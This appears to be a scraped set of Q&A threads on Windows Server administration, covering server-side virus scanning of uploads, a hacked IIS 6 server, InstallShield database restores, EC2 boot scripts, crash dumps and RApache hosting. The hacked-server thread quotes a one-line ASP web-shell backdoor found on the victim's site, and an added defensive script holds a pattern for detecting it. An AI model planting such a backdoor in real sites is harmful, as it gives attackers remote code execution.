On-demand virus scanning Windows - windows-server-2008

I'm wanting to scan files a user uploads to our websites on the server-side. I'd prefer it to be something we can run on-demand that doesn't have to be running all the time on the server. What solutions are available for Windows Server 2008 R2? Which products specifically would you recommend?

If I were in your situation, I would script up a solution to call ClamAV on the file whenever you receive the file. For Windows, if you are running IIS (or any web framework), there is probably some sort of callback on file reception you can plug this into.
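
One way to script the ClamAV call suggested above, as an added example that is not code from the answer: a Python wrapper, assumed to be called by the upload handler after the file has been written to a staging directory outside the web root. `scan_file`, `accept_upload` and the directory layout are hypothetical names; the logic relies on clamscan's exit codes (0 = no virus found, 1 = virus found, 2 = error) and rejects the file on anything other than 0.

```python
import shutil
import subprocess
from pathlib import Path

# clamscan exit codes: 0 = no virus found, 1 = virus found, 2 = error.
CLAMSCAN = ("clamscan", "--no-summary", "--stdout")


def scan_file(path, scanner=CLAMSCAN, timeout=120):
    """Scan one file; return (verdict, detail), verdict in clean/infected/error."""
    try:
        proc = subprocess.run([*scanner, str(path)], capture_output=True,
                              text=True, timeout=timeout)
    except FileNotFoundError:
        return "error", "scanner executable not found"
    except subprocess.TimeoutExpired:
        return "error", "scan timed out"
    if proc.returncode == 0:
        return "clean", ""
    if proc.returncode == 1:
        # The report line looks like "<path>: <signature> FOUND".
        for line in proc.stdout.splitlines():
            if line.endswith(" FOUND"):
                return "infected", line[:-len(" FOUND")].rsplit(": ", 1)[-1]
        return "infected", "unknown signature"
    detail = (proc.stderr or proc.stdout).strip()
    return "error", detail or f"exit code {proc.returncode}"


def accept_upload(staged, publish_dir, scanner=CLAMSCAN):
    """Publish a staged upload only when the scan says clean (fail closed).

    Assumes `staged` has a server-generated name and lives outside the web
    root, so an unscanned file is never reachable by URL.
    Returns (published_path_or_None, verdict, detail).
    """
    staged = Path(staged)
    verdict, detail = scan_file(staged, scanner)
    if verdict != "clean":
        staged.unlink()  # infected OR scanner failure: the file is rejected
        return None, verdict, detail
    target = Path(publish_dir) / staged.name
    shutil.move(str(staged), str(target))
    return target, verdict, detail
```

Treating a scanner error or timeout the same as a detection means a broken or missing scanner cannot silently let uploads through.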

Almost all the antivirus programs provide you a command-line version (or starting parameters) to scan just one file, or a directory.

There are several scanners on demand; there is a list named "Probably the Best Free Security List in the World" which lists a few. Sorry, I cannot provide the link because StackOverflow limits the number of hyperlinks new users can post.
Although not listed in that list, one of the best I've used is F-Prot Antivirus, and it seems it runs well on Windows Server 2008:
https://forum.f-prot.com/index.php?topic=1691.0
Cheers

For your case the best solution would be using http://www.virustotal.com/

Related

I think I've been hacked and am looking for advice

One of my clients noticed a message in Google search results that said their website may have been hacked. After some digging, I found HTML files on the server that contained SEO garbage and JavaScript references. I removed those files, changed CMS passwords, updated some components like CKFinder, etc.
I then started looking into other sites on the server and found tons of .asp files with this line:
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
I've removed those but do not know how they got there. I've looked through various logs (event viewer, website, ftp) but most don't go back far enough from when the files were created.
I've updated the OS, which was only a month or two out of date, and changed FTP access.
What else can I do to find the point of entry or make sure my server and sites are safe?
BTW: This is a Windows 2003 server running IIS 6.0.
There are multiple ways that they may have gotten access to your server.
Are you running a common CMS or custom?
It could be possible that they have found a vulnerability in one of your scripts.
For example, if they found a SQL injection vulnerability they could retrieve database information.
If they were to find an RCE bug (remote code execution), they may have been able to execute system commands, leading to the creation of those arbitrary files.
Other than that, there are a few vulnerabilities in Windows Server that have been patched this week; check out this link:
http://blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html
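
For the clean-up and point-of-entry question in this thread, a detection sweep as an added example (not part of either post): it finds script files that pass request input straight to `Execute`, `ExecuteGlobal` or `Eval`, which generalizes the one-line backdoor quoted in the question, and then pulls the matching requests out of W3C extended IIS logs. The function names, the extension list and the sample log are constructed for illustration, and the script is assumed to run against a copy of the web root and log files.

```python
import re
from pathlib import Path

# Execute/ExecuteGlobal/Eval applied directly to request input, as in the
# one-line backdoor quoted in the question.
SHELL_RE = re.compile(r"\b(?:Execute(?:Global)?|Eval)\s*\(?\s*Request\b", re.I)
# Assumed extension list; extend it to match the server's script mappings.
SCRIPT_EXT = {".asp", ".asa", ".aspx"}


def find_backdoors(webroot):
    """Return (URL path, mtime) for each script that runs request input."""
    root, hits = Path(webroot), []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in SCRIPT_EXT:
            if SHELL_RE.search(p.read_text(errors="replace")):
                url = "/" + p.relative_to(root).as_posix()
                hits.append((url, p.stat().st_mtime))
    return hits


def backdoor_requests(log_lines, stems, param="cmp"):
    """Pick W3C extended log entries that hit a flagged script or carry `param`.

    POST bodies are not logged, so every request to a flagged script counts.
    """
    stems = {s.lower() for s in stems}
    has_param = re.compile(rf"(?:^|&){re.escape(param)}=", re.I)
    fields, out = [], []
    for line in log_lines:
        if line.startswith("#Fields:"):      # column order is declared per log
            fields = line.split()[1:]
        elif fields and not line.startswith("#"):
            rec = dict(zip(fields, line.split()))
            stem = rec.get("cs-uri-stem", "").lower()
            if stem in stems or has_param.search(rec.get("cs-uri-query", "")):
                out.append((rec.get("date"), rec.get("time"),
                            rec.get("c-ip"), stem))
    return out


# Constructed sample log (documentation IP ranges), not taken from the post.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2014-01-10 03:12:44 203.0.113.7 POST /images/thumb.asp - 200
2014-01-10 03:13:02 203.0.113.7 GET /news/index.asp cmp=x 200
2014-01-11 09:00:00 198.51.100.20 GET /default.asp id=4 200
""".splitlines()
```

The earliest log entry for a flagged script, and the request from the same client address just before it, is where to look for the upload or injection that planted the file; file timestamps alone can be altered by whoever wrote the file.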

InstallShield SQL .bak

The problem is that recently at my company we need to make an installer. Since no one here has worked with InstallShield before, we have a lot of questions about it.
So here are the questions:
Am I able to restore a database using InstallShield? I mean, giving it the path of the .bak file and then running a script to recover the database on MSSQL?
Does InstallShield have configuration files, so I'm able to change the files that are going to be used, depending on the client and the software version we are installing? Nowadays we use our own setup, but we have to select the files manually, so when a client wants to install the software we have to go with them and do it, because it is really complex. Now we need to change that by making an installer that can be configured here in our company by an IT member, who then sends the files and the installer to the client, and he only presses "Next, Next..."
Sorry for my bad English
You might find that treating the front-end software and database as two separate items is easier for you and your clients. While many vendors offer the ability to run scripts against SQL Server (and other databases) during the course of the installation, you'll find that there are all kinds of issues you need to contend with (do you need to first install SQL Server, does the user have permission to access the SQL Server, what if they are installing the software on a new pc but don't need the database created again, etc). None of these are showstoppers, but they do create headaches that you need to deal with.
By treating the database and front-end separately, you can build an installation package that installs your front-end software and related components on the target machine. This in and of itself can be tricky to deal with depending upon how complex your software is and the amount of references and prerequisites you need to manage.
When it comes time to manage the database aspect of the program, you may find that the majority of your clients are capable of restoring a .bak file to their SQL Server, and the ones that aren't can always be assisted (probably remotely) by your staff.
If you discover that this isn't the case, you can always create a separate "Server" installation package that manages the database aspect of the installation.
With regards to your question about InstallShield, you'll probably find better information from their website and/or sales staff, but here's a list of their current features.
There are other vendors in the space as well, so look at all of them including InstallAware and my personal favorite Advanced Installer. Pick the one in your budget that offers the features you need. They all should offer trials as well. Download and use them before you buy to find one that works best for you.
Yes, InstallShield can call a script that will restore a DB; you just need to do so in silent mode. And yes, there is a cfg file for InstallShield. The documentation will show this in detail.
Here is some documentation for version 12:
http://kb.flexerasoftware.com/doc/Helpnet/installshield12helplib/IHelpContents.htm
They are currently on version 2012; however, if you are doing this cross-platform, don't use InstallShield, but use InstallAnywhere. It is cross-platform.

How would I create a flexible EC2 Windows 2008 boot script?

If you look at the Linux ecosystem (especially the Ubuntu and Alestic EC2 images) there is a common technique where the VMs are pre-configured to look at the EC2 user-data and use it as a boot script. The nice thing about this approach is that you can write a boot script that further provisions your machine, allowing you to avoid making a new image every time your software that runs on the machine changes.
I want to do the same thing for Windows, but given that I'm a Mac and Linux guy, I'm a bit lost on where to start. My requirements are:
This must run on Windows Server 2008
A bootstrap script needs to start when the machine boots up, read the user-data file by pulling down the contents of http://169.254.169.254/1.0/user-data
The bootstrap script then needs to run the contents of that file as if it were a script
The script embedded in the user-data needs to run in such a way that it has access to the desktop environment (ie: it can launch a browser, etc).
I'm not quite sure how services work in Windows or if I need to enable auto-login, so any advice here would be appreciated. The ultimate goal is to run a Java program that launches some custom software that in turn launches a web browser (IE, Firefox, etc) and is capable of taking screenshots.
The screenshot part is interesting, because in the past when I've tried this the only way I could get something other than a black screen was to have UltraVNC or RealVNC boot up as a service, though I don't know why that helped.
I'm looking for answers to three specific questions, as well as any general advice:
Should I be focussing on a Windows service or auto-login + bat file in the "Startup" folder?
If I use a Windows service, is there anything special that I need to do to make sure desktop access and/or screenshots are available?
Do you recommend any tools for common Linux commands, like curl or wget? Last time I used Windows I used Cygwin a lot, but is there something more appropriate to use here?
I have not tried auto-login on Windows instances in EC2, but here's the support document on how to enable it.
We boot-strap our Windows instances using a custom AMI with a custom Windows 'install' service already installed. The boot-strap installer reads a URL from user-data at startup. The URL points to a ZIP file stored in S3. The installer then downloads, un-zips, and executes the actual application installer -- in our case a simple CMD file.
This setup allows us to have one base AMI and then be able to easily overlay 15+ different application configurations (without having to rebuild the AMI). If you only have one application configuration this may be overkill for your situation.
The only trouble we ran into was having our installer service start too early -- changing the service startup mode to "Automatic Delayed" fixed that issue.
We wrote our boot-strap installer in Java, launched via YAJSW, because we're comfortable with it. If you just want a few simple Unix tools, most are available pre-compiled for Windows, for example wget.
For something completely different, you could try PsExec to configure the instance after it has booted.
You can try using RightScale's free developer account to create plain Powershell scripts and associate them with your Windows instances to run at boot time. The RightScale dashboard solves exactly the problems you are trying to solve above.
DISCLAIMER: I work for RightScale.
As for screen capture CutyCapt is a simple tool you can point at a URL and generate an image from.
Unxutils is a great solution for those looking for unix tools on Windows. It's got the wget.exe that you're looking for, however, using Powershell to download stuff is not so bad either:
$wc = new-object system.net.webclient
$wc.DownloadFile("http://stackoverflow.com","test.html")
If you can write a batch file to do your setup, then you can run it at startup of the vm by doing this:
1. Run REGEDT32.EXE.
2. Modify the following value within HKEY_CURRENT_USER:
Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ParseAutoexec
1 = autoexec.bat is parsed
0 = autoexec.bat is not parsed
As an answer to #3, I would say that you can do just about anything in a batch file that you need, which includes downloading from an FTP server (but not from an HTTP server). I am really interested in this stuff and so if you have questions, try asking me.
If you use Elastic Beanstalk you can use this:
Customizing the Software on EC2 Instances Running Windows
It uses YAML formatting standards, e.g.
packages:
  msi:
    mysql: http://dev.mysql.com/get/Downloads/Connector-Net/mysql-connector-net-6.6.5.msi/from/http://cdn.mysql.com/
or
sources:
  "c:/myproject/myapp": http://s3.amazonaws.com/mybucket/myobject.zip
I know this is a little bit late to help out with the original post but for anyone who is still reading this one solution is to use the http://cloudinitnet.codeplex.com/ project. The service is easily installed using a powershell script and will create a local administrator account to use while running.
The goal for this project was to replace the Cloud-Init project used in Amazon Linux and Ubuntu.

How to configure Win2008 to generate crash dump

I am running my C++ service on a Win2008 server machine. It crashes randomly, and I do not know why. This is happening on multiple machines at a customer site.
How can I configure the system to auto generate a dump of the process?
I need a method that will require minimal installations and UI, preferably only some registry hacks.
Thanks.
[edit] waiting...
You can use Windows Error Reporting locally on a machine without having to involve Microsoft and without having to sign your code. WER can be configured to store local copies of dumps. The MSDN documentation is here:
http://msdn.microsoft.com/en-us/library/bb787181(v=vs.85).aspx
It's a simple, well thought-out system, and is only a couple of registry settings to configure.
If your customer allows it, then I would suggest you install DebugDiag from Microsoft. You can configure the tool to generate dumps when your application crashes and ask them to send you those dumps. I have used this quite often and found it to be successful. If any help is required please let me know.
Sign your executable then register with Microsoft for Windows Error Reporting (the signing certificate costs but WER is free). This will then collect the crash logs when the user hits the 'Send to Microsoft' button. These logs will then sit there until you log in to retrieve them. This requires no other installations on the user's machine.

What is the easiest way to install a R web application through RApache?

I use Windows XP and R for my desktop use. And a shared hosting account (at some company) for my web hosting needs.
I wish to create an R web application and I understand that one such way is by using R with Apache through RApache, but since my current shared hosting plan doesn't allow me to install RApache I am a bit stuck.
So... (and here's my question) what would be the easiest/fastest/cost-effective way to get started?
Buying a more expensive hosting package?
Hosting the thing myself? (on Windows?!)
Switching to some other hosting company that permits the use of RApache?
Any suggestion will be most helpful.
Self-hosting is an option if you insist on using RApache. This might be easier than you think. Here's a link to a blog post I read a month ago before I decided to buy the hardware and serve my own files. I just watched this seven-minute YouTube video tutorial entitled "R Web Application–'Hello World' using RApache"; I believe this was just posted today.
In seven minutes, the author walks through building a "hello world" site using RApache, then walks through a more ambitious example, building a user-input form to collect inputs then deliver them to a particular R function--pretty much an exemplary slice of what I suspect most people would want to use RApache for.
A second option is using a web framework. My recommendation here is Django. Why? It's written in Python so you can access R functionality via the Python bindings (RPy2). Second, if you are not an experienced web developer, Django is in many ways a great framework to begin with because it's truly a "full-stack" solution--it works more or less out of the box. In addition, there is a substantial and growing body of quality step-by-step tutorials, code snippets, and even packaged Django sites to learn from.
It seems they provide a VMWare image to get up and running quickly.
I suggest you download VMWare player and try the image. Since RApache isn't available for Windows, this is the most simple way, I guess. I wouldn't use that for hosting, but I would first try whether this stack is actually the right thing for your app. Also, this allows you testing things locally.
Doug,
Should I read your suggestion as saying that a Django app can call the RPy2 functionality without RApache? If so, that sounds like a solution for folks on shared hosting who can't install the RApache module.